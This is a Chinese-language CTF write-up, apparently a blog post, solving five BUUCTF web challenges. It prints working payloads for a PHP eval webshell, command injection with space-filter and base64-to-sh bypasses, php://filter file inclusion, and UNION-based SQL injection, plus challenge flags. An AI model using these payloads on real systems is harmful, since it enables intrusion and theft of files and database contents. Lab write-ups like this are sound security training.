记录BUUCTF的五道题 Secret File,Exec,LoveSQL,Ping Ping Ping,Knife

先从简单的题目开始讲起
Knife
打开靶机在这里插入图片描述好的看到

eval($_POST["Syc"]);

两种解法一种菜刀,蚁剑直接连,另一种利用漏洞的本质无需工具。
因为这个利用的是远程代码执行的漏洞所以可以直接修改POST的提交参数来利用漏洞。废话不多上解法,我这边用的是蚁剑在这里插入图片描述好的直接连接
在这里插入图片描述
在这里插入图片描述根目录下有个flag文件直接点开
解法2
利用漏洞不知道为什么我的火狐的hackbar的插件不允许我提交post的数据,所以我post的提交都是用burpsuite去完成的
直接抓包在这里插入图片描述提交方式改为POST的提交根据提示添加Syc=phpinfo();可以看到成功执行phpinfo();
然后这边eval函数我去网上查了一会儿,发现是用var_dump()和scandir()来进行远程代码执行的。system()的话应该使用ls和cat进行。
然后构造
Syc=var_dump(scandir(’/’));在这里插入图片描述找到flag然后构造
Syc=var_dump(file_get_contents(’/flag’));去读取flag中的内容
答案:
flag{60eb1232-624d-4aed-afba-84460f77046a}

第二道
Exec打开靶机在这里插入图片描述输入1;ls
在这里插入图片描述看到index.php文件应该是页面内容不是我们想要的那我们直接输入1;ls / 查看根目录在这里插入图片描述好的flag文件不请自来
直接1;cat /flag
答案
flag{358b0d11-481b-4eed-8062-5fea97fff4f5}

第三道
ping ping ping 第三道讲这个不是因为难度,而是这道题是上面一道的延伸,我觉得放在一起讲会更有帮助。打开靶机在这里插入图片描述好的界面又是和ip啥的有关,说实话我当时是先写这道题再去写上面那道的,以至于我当时拿到这道题傻呗的去试模板注入x-forword-for好像是这个,但是不是这个漏洞,只是我自己想多了。
提示 ?ip=
想应该是 $_GET[“ip”],直接一把梭
?ip=1;ls在这里插入图片描述直接?ip=1;cat flag.php
在这里插入图片描述fxck 我的空格这么狠 空格绕过的话我直接去查
${IFS}
$IFS$1
<
<>
{cat,flag.php}

大家自己试一下ps:有几个我是看过来的不知道行不行因为这道题过滤了好多字符
?ip=1;cat$IFS$1flag.php
页面提示 f*ck我的flag,那我看看index.php总行了吧在这里插入图片描述小家伙过滤的还挺多这里不带大家一一审计了,因为基本都是正则的匹配,我想的是拼接绕过正则匹配,有大佬也说看到后面的 $a= 可以直接考虑变量覆盖,其实我有点懵。但是不妨碍我构造payload

?ip=1;b=a;c=g;a=fl;cat$IFS$1$a$b$c.php
在这里插入图片描述nmd东西呢????按下F12看看,差点以为自己输错了,小家伙给我注释了
答案
flag{05f012eb-f6a0-4491-b1b6-77517ed135dd}
这道题我后来去看了博客上的大佬还有好多种解,我当时就真的佩服他们是真tm的牛,因为过滤了bash就用sh
echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh
将cat flag.php base64加密后再解密真的天才
第四题secret file
在这里插入图片描述有小秘密????
页面没什么东西F12看看
在这里插入图片描述有个链接/Archive_room.php访问他看看在这里插入图片描述按一下小按钮
在这里插入图片描述我还啥都没看到呢???
这时候我们F12看到network的地方
在这里插入图片描述这里有个action.php很可疑啊,再看看前面的状态码302好的重定向到这个结束的页面,那就用burpsuite来干他,奥利给
在这里插入图片描述看到了啥secr3t.php 直接访问

<html>
    <title>secret</title>
    <meta charset="UTF-8">
<?php
    highlight_file(__FILE__);
    error_reporting(0);
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag放在了flag.php里
?>
</html>

这个过滤有点弱啊,该过滤的一个都没过滤,看到include()文件包含php伪协议一把梭,这个payload挺万能的大家可以用一哈
php://filter/read=convert.base64-encode/resource=
那串base64值有点长大家自己复制吧,我这里有点懒得复制了。

第五题love sql 哈哈这道题我当时真的要笑出来了在这里插入图片描述随便输入一下
在这里插入图片描述这边要先测试注入点是username还是password大家可以自己试一试,试出来是password这边的注入,接下来猜password=1’
在这里插入图片描述看到报错了 ‘‘1’’’ 后面多了个引号那就–+注释掉在这里插入图片描述还是报错??’’'三个引号,这里–+难道没注释掉吗?
那继续注释在这里插入图片描述那放入 or 1=1
在这里插入图片描述给我账号密码有勾八用-.-,那就用最简单的sql语句吧这里用information_schema的有据查询,

1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek' --+ --+
1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1' --+ --+
1' union select 1,2,group_concat(password) from l0ve1ysq1 --+ --+

答案
flag{f1a0a2e8-6e78-477b-aa54-38be2c8984cb}
结束!大家写完题目记得记录知识点呦!!

  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值